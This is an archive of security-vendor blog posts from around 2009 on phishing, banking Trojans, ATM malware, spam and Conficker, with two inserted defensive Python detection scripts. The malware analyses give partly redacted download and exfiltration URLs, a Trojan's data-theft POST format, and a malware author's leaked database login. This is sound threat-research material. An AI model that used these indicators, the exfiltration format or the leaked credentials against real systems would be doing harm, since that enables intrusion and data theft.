Archive for the 'Data Theft' Category

Sex the Bait in Mass Orkut Compromise

With the advent of Web 2.0, social networking websites have become an easy target for online fraud and other identity scams. Lately, we have seen Twitter being used to phish personal information, as well as MySpace scams and Facebook spam.

With more than 15 percent of its traffic coming from India, Orkut is perhaps the most popular and widely used social networking website in the country. Phishers have come up with an elegant approach to social-engineer the less tech-savvy users on Orkut: they have updated the profiles of several thousand compromised Orkut accounts so that they now link to various phishing websites, which lure visiting users into divulging their personal information.

Various phishing websites claim to be the “adult” variant of Orkut. The “Orkut Sex” site has been very successful in luring several thousand Orkut users into entering their credentials into this fake site. The attackers use the harvested credentials to steal further personal information for monetary gain.


We have observed scores of websites being used in this phishing attack. Here are a few of them:

  • http://orkutsexlogi[blocked].tk
  • http://s3x[blocked].kilu.de
  • http://orkutst[blocked].tk
  • http://album[blocked].kilu.de
  • http://priya[blocked].freehostia.com

If you have read this far, I probably don’t need to remind you to look carefully before you enter your personal details on the web. Always make sure that you are safe and protected, and keep away from the rip-offs.

More Password-Theft Shenanigans

Recently, my colleague Pedro Bueno wrote about “dumb” malware authors hardcoding their login credentials into their password-stealing Trojan. The malware he referenced, PWS-Banker.gen.i, ostensibly came from Brazil. Today, we found the same negligence in a similar piece of Chinese malware detected as PWS-Banker.gen.de.

When run, the password-stealing Trojan looks up the infected host’s public IP address using three web-based IP-lookup services. It then connects over TCP to a SQL server in China and posts the stolen passwords to it. This is part of the actual connection string used to log into the malicious SQL server:

Provider=SQLOLEDB.1;Password=168520564;Persist Security Info=True;User ID=mengmeng;[REMOVED]

mengmeng has been malicious and, what’s more, careless enough to leave his login credentials in the open. Please keep your DATs updated to stay secure!

Dumb Malware Authors Cause More Damage Than Smart Ones

I don’t really know which is worse: a dumb or a smart malware writer.

Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

Next the malware sends the information to a remote SQL database. Nothing new here; password-stealing Trojans have been around for several years. What struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole): all the credentials needed to access the remote database are hardcoded inside the malware.

Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000

What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now anyone who checks the malware can also get access to that data! And by “checking” I do not mean anything that requires reverse engineering.
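Because the connection string sits in the binary in clear text, pulling it out of a sample is a strings-level triage task. The Python below is an added example written for this page, not McAfee’s tooling or the malware author’s code: it scans a binary blob for printable ASCII and UTF-16LE runs, picks out anything that looks like an OLE DB/ADO connection string, splits it into key/value pairs, and prints one report line per credential with the password masked. The sample “binary” is constructed here from the two redacted connection strings quoted in these posts, padded with filler bytes to stand in for a real executable.

```python
import re

# Printable runs of at least 8 characters, as plain ASCII and as UTF-16LE
# (the two encodings `strings -a` and `strings -el` would report).
_ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")
_UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")

# A Provider= or Data Source= key marks an OLE DB / ADO connection string;
# these are the keys that hold the secret.
_CONN_MARKER = re.compile(r"(?i)\b(?:provider|data source)=")
_PASSWORD_KEYS = ("password", "pwd")


def printable_strings(blob: bytes):
    """Yield printable strings from a binary, first the ASCII runs, then the UTF-16LE runs."""
    for m in _ASCII_RUN.finditer(blob):
        yield m.group().decode("ascii")
    for m in _UTF16_RUN.finditer(blob):
        yield m.group().decode("utf-16-le")


def parse_connection_string(s: str) -> dict:
    """Split 'Key=Value;Key2=Value2;...' into a dict keyed by lower-cased key.
    Fragments without '=' (such as a '[REMOVED]' placeholder) are skipped."""
    fields = {}
    for part in s.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip().lower()] = value.strip()
    return fields


def extract_connection_strings(blob: bytes) -> list:
    """Return every parsed connection string in the blob that carries a password."""
    found = []
    for s in printable_strings(blob):
        if not _CONN_MARKER.search(s):
            continue
        fields = parse_connection_string(s)
        if any(k in fields for k in _PASSWORD_KEYS):
            found.append(fields)
    return found


def summarize(fields: dict) -> str:
    """One report line per credential: provider, user and host in clear, password masked."""
    user = fields.get("user id") or fields.get("uid") or "?"
    host = fields.get("data source") or fields.get("server") or "?"
    password = fields.get("password") or fields.get("pwd") or ""
    masked = password[:1] + "*" * (len(password) - 1) if password else ""
    return f"{fields.get('provider', '?')} user={user} host={host} password={masked}"


# Constructed sample "binary": a fake header, then the two redacted connection
# strings quoted in these posts, one stored as ASCII and one as UTF-16LE.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;"
      b"Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000"
    + b"\x00" * 8
    + "Provider=SQLOLEDB.1;Password=168520564;Persist Security Info=True;"
      "User ID=mengmeng;[REMOVED]".encode("utf-16-le")
    + b"\x00" * 4
)

if __name__ == "__main__":
    for creds in extract_connection_strings(SAMPLE_BLOB):
        print(summarize(creds))
```

Run against a real sample, the same two functions give an analyst the user name and server to put in a takedown or abuse report without copying the password around; the UTF-16LE pass matters because Windows binaries frequently store such strings as wide characters, where a plain `strings` run would miss them.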

Yes, it is just another password-stealing Trojan. No need to get too excited. :) And, yes, we already detect this malware–as PWS-Banker.gen.i.

ATM Malware Makes Withdrawals in Russia

We frequently encounter password stealers and backdoors on computers whose owners have browsed unsafe websites or opened unknown email attachments. It is far more unusual, however, to see such malware installed directly on banks’ automated teller machines. In these cases the Trojans have to be installed by people with physical access to the machines, and collecting the data and removing the malware require yet more visits. It should seem obvious that such a malware installation requires a high level of “cooperation” from bank staff.

One of the first attacks occurred in Russia more than one year ago. It was announced in January 2009, when Diebold Inc. released a security fix for its Opteva Windows-based ATMs. At that time, the company said some suspects had been apprehended, but it seems the gang was not fully dismantled. In May, we heard of new suspicious files discovered in Eastern European ATMs. The security firm Trustwave published a study on the matter: the software had been updated and new virtual robberies had been launched. On June 3, The Register also raised public awareness by covering the story.

When active, the Trojan intercepts transactions and records them in log files. To control an infected ATM, the attacker uses dedicated cards that unlock a set of administrative functions. Via the ATM’s display and keypad, he can select options to show statistics (numbers of transactions, cards, keys), print the collected data, force the machine to dispense all its cash, uninstall the malware, and reboot the ATM. Unfortunately, I was unable to test such malware in a real environment (I do not have a spare ATM lying around), but looking at the samples is very instructive. As in the previous attacks, the vulnerable ATMs are equipped with the Diebold Agilis 91x software, and the attacker can examine the registry to display the version and statistics:

Targeted currencies are the U.S. dollar, Russian ruble (RUR), and the Ukrainian Hryvnia (UAH):

The attacker can also, through a password-protected routine, control the currency-dispensing ATM cassette:

We are not aware of any such attacks outside Eastern Europe, but we encourage financial institutions to verify the integrity of their ATM systems. Be proactive!

The known versions of this malware are detected by McAfee VirusScan as PWS-BoldDie. Many generic and unclassified versions can be detected under the name Generic Backdoor!bw.

New McAfee Whitepaper on Browser Attacks

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success.”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Social Engineering Aids Malware Delivery

Earlier today the nice folks at SANS blogged about a malware campaign dressed up as a digital-certificate update for Bank of America. The malicious link contained the substring “bankofamerica.com” and took you to a Web page rigged to mimic Bank of America’s Web page:
Bank of America phish
If you clicked on “Update Certificate,” a certifiably nasty piece of malware was served to you under the filename sophialite.exe.

Did you install this “certificate” by accident? Worry not. We have proactively detected this file as Spam-Mailbot.m since the 5631 DATs, released on May 30. Further, we have added detection for the file that it drops into C:\Windows\system32\sdra64.exe as PWS-Zbot and memory cleaning for the same as Spy-Agent.bw.gen!mem. This will make it to the DATs after Wednesday, June 3.

The takeaway from today’s social-engineering attack: if you receive suspicious email claiming to come from your bank, do not follow the links in it! Visit banking websites only via your own bookmarks. In the second step of today’s attack, cautious users may have spotted the deception by noticing that the “Secure Area” label appeared on a page served over plain HTTP rather than HTTPS.

Psychologists would term the tricks employed above as abuses of the “exposure effect” and “anchoring.” For some background on these terms, have a peek at my article on the psychology of social engineering in the Fall 2008 edition of McAfee Security Journal. Happy reading :).

McAfee Releases June Spam Report

Today we released our Spam Report for the month of June. In it we discuss two key findings:

President Obama’s First 100 Days of Spam
Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

Identifying Spam Trends of the Future
Even though we’ve been told to avoid clicking links in unsolicited email, to keep spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

McAfee Unveils H*Commerce Web Film Series on Cybercrime

Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

Fight Against Cybercrime Gets Organized

The fight against cybercrime has shown some very promising progress over the last few years. We are certainly not where we want to be, but we are on a good path. McAfee’s own Initiative to Fight Cybercrime has been in force for more than half a year. Recently our Cybercrime Response Unit was launched; it is an online help center designed to assist victims (and people who suspect they may be victims) of cybercrime. But best of all: we are not alone!

McAfee has teamed up with many other companies and institutions to form the Conficker Working Group, which has set a precedent that raises hope for the future. Just this week I attended the Counter eCrime Operations Summit (CeCOS) in Barcelona, Spain, hosted by the Anti-Phishing Working Group (APWG). This year’s meeting focused on the development of response paradigms and resources for managers and forensic professionals who fight e-crime. There were a number of very useful presentations and panels on user education, on better interaction among the various entities, and case studies showing how successful this can be.

Even more important were the small meetings outside the official program, connecting researchers from security companies, CERTs, and law enforcement agencies throughout the world with each other and talking over how we can improve the current situation. This has been a very productive week. At least I now have some hope for the future! ;)

McAfee Releases First-Quarter Threats Report

Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase over 2008. The United States is now home to the largest share of botnet-infected computers, currently hosting 18 percent of all zombie machines. It seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

Other Key Findings

The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

You can find the full text of the “McAfee Threats Report: First Quarter 2009” here.

Swine Flu Subjects and e-Pharmacy Sites

We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

The image below is a collection of a bunch of swine flu spams:

Swine Flu Spams

You may notice several things here. First, they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to .cn domains. Yes, .cn is China’s top-level domain, but these are all redirects: when I looked at the InterNIC registry information, it was a round-robin of Chinese and Russian domains and NS records.

Here is a screenshot of the e-pharmacy they all lead to:

Swine Flu e-Pharm Site

You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

A closer look at a Swine Flu spam

It has been just a few days since we started talking about spam that uses swine flu to catch users’ attention and sell pills. This time, however, the message is not very “healthy”:

Swine Flu

The message above is in Portuguese and goes roughly like this: “For those who still don’t know, the pictures below show the terminal stage of swine flu. The experts are trying to calm people down, but the pictures show that calming down is the only thing we shouldn’t do. See what the patient looks like in the advanced stage.”


As we saw in David’s post yesterday, Brazil is the number one source of swine flu spam. In this case the spammers use the name and logo of Rede Globo, the biggest TV network in Brazil, to catch users’ attention. But remember, this is spam; they use the branding to make users believe the news is real.

The links lead to two different malware files:

http://cch.[removed].dk/images/thumb/xxx/alerta.php?atencao=visualizar
=> Foto.29.04.2009.com

http://[removed].ru./uploaded/alerta.php?atencao=ver
=> Foto.29.04.2009.jpg.exe (note the double extension, meant to pass as a photo)

They are detected as PWS-Banker-dldr and PWS-banker-gen.g, respectively.


The file Foto.29.04.2009.com is a downloader that fetches the URL below and drops it as C:\WINDOWS\temp\configura.exe:

http://201.xx.xxx.xxx/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif

The downloaded file (a Windows executable despite its .gif name) is detected as PWS-Banker-gen.b.

This is a common banker malware that overlays a fake image on top of the real banking site. Here is an example sequence: it tells the user his account will be suspended unless he updates his information with the bank, then asks him to enter his personal information and even his credit card data:

overlaid bank image

overlaid bank image

overlaid bank image


The information about the infected machine and the banking data are then posted to the sites below:

hxxp://[removed-1].100webspace.net/post.php
hxxp://[removed-2].100webspace.net/post.php
hxxp://[removed-3].100webspace.net/post.php
hxxp://[removed-4].100webspace.net/post.php

This is the string appended to the URLs above (the machine name and user name travel as one ‘+’-separated value, and INFECTADO is Portuguese for “infected”):


tipo=inf&tip=[machinename]+[username]&inf=INFECTADO%0D%0A&
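Since this check-in is a plain HTTP POST with a fixed field layout, it is easy to spot in proxy logs that record the request body. The Python below is an added example for this page, not the analysis tooling used by the author: it parses a few constructed log lines (the timestamps, client addresses, machine names and 100webspace.net subdomains are made up for the example) and flags requests whose body matches the banker’s check-in, decoding the machine name and user name from the tip field. It matches on the body rather than on the hosting domain, because 100webspace.net is a free host that also serves legitimate sites; the domain only serves as a supporting indicator.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log (made-up timestamps, clients, hosts and victims) in a
# simple space-separated format: <epoch> <client> <method> <url> <post-body or ->
# Lines 1 and 4 mimic the banker's check-in described above; 2 and 3 are benign.
SAMPLE_LOG = """\
1241000001 10.0.0.23 POST http://sample-drop-1.100webspace.net/post.php tipo=inf&tip=WKSTN-07+maria&inf=INFECTADO%0D%0A&
1241000002 10.0.0.41 GET http://www.who.int/csr/disease/swineflu/en/ -
1241000003 10.0.0.23 POST http://forum.example.org/post.php tipo=comment&tip=hello&inf=none
1241000004 10.0.0.58 POST http://sample-drop-3.100webspace.net/post.php tipo=inf&tip=LAPTOP-12+joao&inf=INFECTADO%0D%0A&
"""


def parse_checkin(body: str):
    """Decode a POST body; return (machine, user) if it is the banker's
    'tipo=inf&tip=<machine>+<user>&inf=INFECTADO...' check-in, else None."""
    fields = parse_qs(body, keep_blank_values=True)
    if fields.get("tipo") != ["inf"]:
        return None
    if "INFECTADO" not in (fields.get("inf") or [""])[0]:
        return None
    # parse_qs turns the '+' into a space, so tip reads "<machine> <user>"
    tip = (fields.get("tip") or [""])[0]
    machine, _, user = tip.partition(" ")
    return machine, user


def scan_log(text: str) -> list:
    """Return one record per log line whose POST body matches the check-in."""
    hits = []
    for line in text.splitlines():
        ts, client, method, url, body = line.split(" ", 4)
        if method != "POST":
            continue
        info = parse_checkin(body)
        if info is None:
            continue
        parts = urlsplit(url)
        host = parts.hostname or ""
        hits.append({
            "ts": int(ts),
            "client": client,
            "host": host,
            "path": parts.path,
            "machine": info[0],
            "user": info[1],
            # weaker, supporting indicator: the drop sites seen here live on a free host
            "free_host": host.endswith(".100webspace.net"),
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['client']} -> {hit['host']}{hit['path']} "
              f"victim={hit['machine']}/{hit['user']} free_host={hit['free_host']}")
```

The decoded machine and user names are exactly what the attacker receives, so the same records double as a victim list for the incident response team.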

 

One image inside this malware caught our attention. The image below tries to pass itself off as the website of Brazil’s National Public Security Secretariat (SENASP), a site used by Brazilian law enforcement agents to look up information about Brazilian citizens:

overlaid bank image

The attackers attempt to steal usernames and passwords for this site. If the miscreants got access to it, they would be able to pull information about any Brazilian citizen they wanted, even the president. Now tell me about identity theft!

As we can see, an apparently innocent e-mail could cause your banking information to be stolen, and could have even more serious implications, as in the case above.

Looking at Swine Flu Spam Globally

Following up on Chris Barton’s excellent blog the other day on swine flu spam, we wanted to take a closer look at the numbers.

Many people may not realize that the words “swine” and “flu” had really not been seen in spam before this past weekend, and almost certainly not together in the same subject line, so we started there. Using our TrustedSource technology and intel, I was able to pull the following chart on the sheer growth of “swine” and “flu” used together as a subject over the last several days:

Percent Increase of Swine Flu in Subject Line

Bear in mind that is NOT daily volume growth but rather the growth in its use as a subject.

From the beginning of the campaigns we have seen it generated from all over the world. That is not really a surprise, considering the global nature of botnets and spam, but the country breakdown is interesting to look at. It seems that Brazil, the United States, and Germany are the biggest producers/sources at the moment:

Countries Sending Swine Flu Spam

No country is safe from spammers, eh? When you consider that on any given day between 80 and 170 billion email messages are sent, with 78 to 90 percent of them being spam, a “swine flu” subject gives these criminals a high chance of success because of the media attention the topic is already getting. Social engineering is one of the most successful and dangerous tools at the spammers’ disposal, and it is very hard to protect against.

April Email and Spam Volumes

We have also seen sites with the words “swine” and “flu” pushing malware. In this case it’s a redirect to a Russian-based site that requires our old friend, the fake codec, to be installed to view the movie:

Swine Flu Redirect to Fake Codec

Malware writers, spammers and scammers are low lives. They will use any high media event or high impact news story to push their wares including the sickness and misery of others. Stay vigilant and stay safe. Should you need credible information on the influenza pandemic then go to The World Health Organization website.

Laundering as a Service

Money laundering is a process for concealing the origin of funds generated by illegal means. People generally associate money laundering with drug trafficking, gun smuggling, or corruption. But funds misappropriated by identity theft, phishing, and carding also have to be “laundered.” Today, the mushrooming of virtual money (or e-currency) makes the job easier when you need to eliminate traces of suspicious actions. In the past, E-Gold and WebMoney were frequently under suspicion and had to respond to serious allegations of having been used to transform “dirty money” into “clean money.”

But they are not unique; ECUMoney, Liberty Reserve, PerfectMoney, Pecunix, etc., are also on the scene. As with all digital gold currencies, these systems offer nonreversible transactions, which is a primary advantage when you want to manipulate money.

Today, websites offering virtual money exchange are numerous on the Internet. They are profitable for their owners because they charge significant exchange commissions. It is also relatively safe for the people offering these services. In the past, malware authors explained that they created their programs only for educational purposes and were not responsible for any inappropriate use. Today the administrators of such websites are trying to claim they are not liable for the origin of the money passing through them.

Here too, the network is turning professional, and many former crooks are now specializing in this field. In October 2004, the U.S. Secret Service arrested people said to be responsible for a set of credit card and identity thefts that had plagued Internet users. It was the result of Operation Firewall. Most of them frequented ShadowCrew, a worldwide marketplace where thousands of members traded stolen credit cards and debit cards, as well as bank account numbers and counterfeit identification documents, such as drivers’ licenses, passports, and Social Security cards.

One convicted person, using Voleur (French for “thief”) as a pseudonym, set up a special payment system for cybercrime transactions. For a 10 percent commission, he exchanged cash for E-Gold, the well-known and controversial digital gold currency. Voleur laundered money for dozens of deals by forum members, moving amounts ranging from $40,000 to $100,000 per week. With about twenty other individuals, he pleaded guilty in November 2005, was sentenced in June 2006, and was released later on.

At that time, Voleur’s work was not institutionalized. But today, I believe, this individual is again in business and manages some websites specialized in giving advice for digital currency activities. One of them is named “Voleur Financial Services”; that’s a tall order!

http://vil.nai.com/images/FP_BLOG_090416_1.jpg

On another site from the same origin (same administrators), we can see some examples of current fees:

http://vil.nai.com/images/FP_BLOG_090416_2.jpg

Many people want to seize power in this fruitful business, and there are no holds barred. Enemies of Voleur often spread stories of him on the Internet and do not hesitate to reveal bank account numbers.

http://vil.nai.com/images/FP_BLOG_090416_5.jpg


U.S. nationals are not alone in this business. At the time of Operation Firewall, an Eastern European married couple (he is Russian, she is Ukrainian), their son, and several other people were arrested after they moved more than $35 million in suspect funds through their company, a pioneer of virtual money exchange. Their office was originally located in the Empire State Building, in New York City. Approximately $20 million flowed through E-Gold digital currency accounts. It is also estimated they purchased approximately $15 million worth of WebMoney digital currency.

Now, from the Manhattan House of Detention, the main prisoner/offender keeps his blog, gives security advice, and is visited by compassionate countrymen. Some of his friends (I suppose) still manage such exchange sites from Russia. From one of them, these screenshots show transfer fees and how easy it is to remain anonymous in the world of money transfers.

http://vil.nai.com/images/FP_BLOG_090416_3.jpg
http://vil.nai.com/images/FP_BLOG_090416_6.jpg


When you visit the website, you will discover a touching interview made in a U.S. jail and the (presumed) building housing the actual company: a bit empty, but nonetheless prestigious in the New York area.

http://vil.nai.com/images/FP_BLOG_090416_4.jpg

In early April, at an annual conference of the Association of Russian Banks, Finance Minister Alexei Kudrin explained that many small banks are now “engaged in money laundering”. It seems that many suspicious online companies are also engaged in this business both in and outside of Russia.

Hacking Exposed at RSA

RSA is pretty much over now and it has been a blurry several days. Some real good sessions, some real good panels. Lots of meetings and interviews and many old friends on hand (shoutouts to Dave Perry, Larry Bridwell, and Lysa Myers), but I digress. …

For me the best event was the “Hacking Exposed” session, by Stuart McClure and George Kurtz. OK, I cop to being biased because I know and work with both these gents/slackers at McAfee, but they did show a really wild hack–they pwned a primary domain controller from an iPhone! Yep, you read that correctly. They hacked a Windows server FROM an iPhone.

For those who were not among the anointed who attended, I have uploaded the slide deck here. Stu and George recorded the hack as well:

Mac Malware In The News

There has been a bit of chatter today about the first ever Mac-based botnet. This piece of malware actually appeared back in January of this year.

Quite frankly there is not any functionality in this “bot” (some would simply call it a remote access trojan but let’s not split hairs OK!!) that we have not seen before. The only thing of concern here is that it does affect the Mac platform which certainly is fresh territory.

As we discussed in our previous blog, it is spread through pirated software at this point (a huge no-no anyway), so hopefully distribution will be light and will not result in large numbers. It definitely highlights the need for security software regardless of platform!

The Carbon Footprint of Spam

Today McAfee has released The Carbon Footprint of Email Spam Report. The study looks at the global energy expended to create, store, view, and filter spam across 11 countries: Australia, Brazil, Canada, China, France, Germany, India, Mexico, Spain, the United States, and the United Kingdom. The report correlates the electricity spent on spam with its carbon footprint, because fossil fuels are by far the largest source of electricity in the world today. Since emissions cannot be isolated to one country, the study averages its findings to arrive at the global impact. Key findings include:

• The average greenhouse gas (GHG) emission associated with a single spam message is 0.3 grams of CO2. That’s like driving three feet (one meter); but when multiplied by the yearly volume of spam, that amount is equivalent to driving around the earth 1.6 million times.
• Much of the energy consumption associated with spam (nearly 80 percent) comes from users deleting spam and searching for legitimate email (false-positives). Spam filtering accounts for just 16 percent of spam-related energy use.
• Spam filtering saves 135 terawatt hours (TWh) of electricity per year. That is equivalent to taking 13 million cars off the road.
• If every inbox were protected by a state-of-the-art spam filter, organizations and individuals could reduce today’s spam energy by 75 percent or 25 TWh per year, the equivalent of taking 2.3 million cars off the road.
• Countries with greater Internet connectivity and more users, such as the United States and India, tend to have proportionately higher emissions per email user. The United States, for example, had emissions that were 38 times that of Spain.
• While Canada, China, Brazil, India, the United States and the United Kingdom showed similar energy use for spam by country, Australia, Germany, France, Mexico, and Spain came in about 10 percent lower. Spain had the lowest figure, with both the smallest amount of email that was received as spam and the smallest amount of energy use for spam per email user.

Not only is spam related to cybercrime and a nuisance, but it also impacts the environment. Download the study here. It’s worth a read.

Conficker on the prowl after the 1st…

So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

When it did wake, it used the peer-to-peer (P2P) communication channel to call home rather than the HTTP rendezvous to start its latest escapade. In this case, the infected host is first contacted by another host over an ad-hoc P2P connection, kind of like an alarm clock. Then, after hitting the snooze button for a period of several hours, the communication begins again, this time initiated by the infected host.

Conficker is definitely not in any rush to tango. Communication is done in such a manner that this traffic (aka the update) may go unseen, or at least mostly under the radar, by using fragmented and irregular UDP communication.

So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play: the infected host goes out to an address and an encrypted executable file is downloaded. Once decrypted and executed, it could be malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the screenshots below:

We have also seen some hosts serving up a Waledac payload. (Realistically, it may contain anything the bad guys are serving up on those domains.)

These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time, however, it is closer to the original patch, so as to elude detection. (Note: our McAfee Conficker Detection tool is in the process of being redesigned to detect the latest variants.)

There are also two other notes of interest. The first is that we have a new deadline to watch: on May 3rd this latest variant is set to expire.

Thinking aloud, this point brings some interesting questions to mind. Is this just a test from the Conficker crew, who are serving up Waledac incidentally? Or is this done for other self-serving reasons (attention diversion, for instance)? Maybe it’s just a deadline for a rented botnet? These are questions I am sure the security community at large is wondering about.

Second, when an infected host resolves an HTTP rendezvous domain name, it compares the resolved IP with the list of IPs it has already queried; if the new IP is already in the list, it moves on to the next domain in its list.

Of course, we will update if anything else comes along…

Google Searching for Madoff’s Yacht Leads to Fake Anti-Virus and Malware

Have you ever read an article on the web where you just had to Google a certain term or phrase to learn more about it, or even just to satisfy your own curiosity? The answer is likely yes, and it’s probably a frequent occurrence. That’s what malware distributors have figured out. Here’s an example. A news article about disgraced financier Bernard Madoff made mention of his 55-foot yacht, a 1969 Rybovich. Wow, I bet that’s a spectacular yacht. If you wonder what one looks like, perhaps you might do a quick search for “1969 Rybovich.” One may think such a casual search would be harmless. Think again. It turns out malware distributors have homed in on the yacht phrase, and the top Google results are malicious URLs. We first noticed this on the evening of April 1 when we first read the story and were curious, and our first take was “Wow, they are fast.” We watched the evolution of the number of Google results that presented malware over the course of April 2. The last we checked, even one of the blogs off of my.barackobama.com was utilizing this yacht to lure users.

Google Search Results

The search results don’t look so threatening, but if you click on the first few URLs, you’ll find differently. Each of these URLs is a rogue anti-virus URL that will distribute malware. Here are a couple of examples…

Quite a bad site indeed!

Misleading Searches Lead to Porn and Malware!!!

These two examples should arouse suspicion by now, especially if you’re looking for yachts, but anyone acting in haste, or succumbing to further curiosity, will be taken to the malware delivery upon clicking where prompted; frequently the malware has already been delivered even if you don’t click.

This example is quite typical of what you’ll see next when you click, a fake malware scan that delivers the malicious goods. It looks just like an MS scanner!!!

Rogue AV Sure Does Look Real!!!

So what about that 1969 Rybovich? What about further curiosity-based Googling? Next time you find yourself conducting such a search, do so with caution. Consider whether the search result URLs all look similar. In this case, that is the first red flag. When you click to go to a link, does the content look like what you expected, or is there some unexpected prompt to click? This is red flag number two. One shouldn’t even proceed to red flag number three, the fake malware scan. By then you’re already on a dangerous path that is not going to show you anything about Madoff’s yacht.

The most common vulnerabilities used by malevolent URLs in China

Every day there are thousands of websites that have been injected with malicious code, and there are millions of hosts that have been infected by malware from these malevolent URLs. The main vulnerabilities lately are Windows-based as well as third-party application issues. This blog will introduce the most common vulnerabilities used by malevolent URLs in China throughout 2008.

1. BaoFeng2 Storm
BaoFeng2 Storm is the most popular media player used in China. The software supports multiple media formats, its features are easy to use, and it is free. Multiple buffer overflows in BaoFeng2 Storm allow for the downloading and execution of files. The CVE number is CVE-2007-4816.
Reference:
http://www.baofeng.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816

2. Baidu Soba
Baidu Soba is a search bar for the Internet that is integrated with a powerful MP3 search, web page search, Flash search and so on. Vulnerabilities in the BaiduBar.dll in Baidu Soba have allowed for the download and execution of files via a specific link. According to the vulnerability description, the vulnerability exists in versions prior to version 5.4. The CVE number is CVE-2007-4105.
Reference:
http://bar.baidu.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105

3. Xunlei Web
Xunlei Web is downloader software. Its GUI control is very browser-like. It’s important to note that people can find more and more valuable resources to download via Xunlei Web, so Xunlei Web has a great many customers. Buffer overflows in Xunlei Web before version 5.6.3.44 allow for the execution of arbitrary code. The CVE number is CVE-2007-5064.
Reference:
http://dl.xunlei.com/index.htm
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064

